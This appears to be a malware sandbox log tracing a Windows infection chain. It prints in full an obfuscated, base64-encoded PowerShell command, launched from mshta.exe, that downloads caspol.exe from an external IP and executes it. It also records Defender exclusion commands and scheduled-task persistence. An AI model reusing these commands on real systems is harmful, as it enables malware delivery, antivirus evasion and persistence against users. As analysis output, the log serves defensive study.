Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4i1jhsy0\4i1jhsy0.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8B10.tmp" "c:\Users\user\AppData\Local\Temp\4i1jhsy0\CSC6DB7E53F49C54638AC449C3AA969DEC.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\caspol.exe "C:\Users\user\AppData\Roaming\caspol.exe"
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe"
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpF9BA.tmp"
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process created: C:\Users\user\AppData\Roaming\caspol.exe "C:\Users\user\AppData\Roaming\caspol.exe"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fkur3fvp\fkur3fvp.cmdline"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\caspol.exe "C:\Users\user\AppData\Roaming\caspol.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1ED7.tmp" "c:\Users\user\AppData\Local\Temp\fkur3fvp\CSC55312E8BACB34CD3B1B97BFED1B34D9.TMP"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmp9F6B.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process created: C:\Users\user\AppData\Roaming\caspol.exe "C:\Users\user\AppData\Roaming\caspol.exe"	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpBD09.tmp"
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Process created: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Process created: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4i1jhsy0\4i1jhsy0.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\caspol.exe "C:\Users\user\AppData\Roaming\caspol.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8B10.tmp" "c:\Users\user\AppData\Local\Temp\4i1jhsy0\CSC6DB7E53F49C54638AC449C3AA969DEC.TMP"
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe"
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpF9BA.tmp"
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process created: C:\Users\user\AppData\Roaming\caspol.exe "C:\Users\user\AppData\Roaming\caspol.exe"

Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskeng.exe	Section loaded: ktmw32.dll
Source: C:\Windows\System32\taskeng.exe	Section loaded: wevtapi.dll
Source: C:\Windows\System32\taskeng.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\taskeng.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\taskeng.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\taskeng.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: wow64win.dll
Source: C:\Users\user\AppData\Roaming\caspol.exe	Section loaded: wow64cpu.dll
